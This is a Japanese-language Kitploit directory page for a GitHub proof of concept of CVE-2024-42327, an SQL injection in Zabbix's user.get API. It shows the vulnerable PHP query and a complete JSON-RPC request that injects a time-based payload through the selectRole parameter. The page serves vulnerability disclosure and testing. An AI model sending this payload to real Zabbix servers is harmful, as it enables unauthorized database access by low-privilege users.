Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-42327 — CVE-2024-42327 / ZBX-25623 の PoC | Kitploit
ツール/GitHubGitHub/compr00t/cve-2024-42327
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

CVE-2024-42327 / ZBX-25623 の PoC

リポジトリを見る
1851年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-42327 / ZBX-25623 の PoC

Zabbix フロントエンドの非管理者ユーザーアカウントで、デフォルトの User ロール、または API アクセスを許可するその他のロールを持つ場合、この脆弱性を悪用できます。CUser クラスの addRelatedObjects 関数には SQLi が存在します。この関数は、API アクセスを持つすべてのユーザーが利用できる CUser.get 関数から呼び出されます。

免責事項

このスクリプトは教育目的のみで提供されています!

概念実証

バージョン 6.0.31 の次のコードは SQLi に対して脆弱です:

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

以下の呼び出しは脆弱性を引き起こします:

root@kitploit:~
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

参照

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
ツールをダウンロード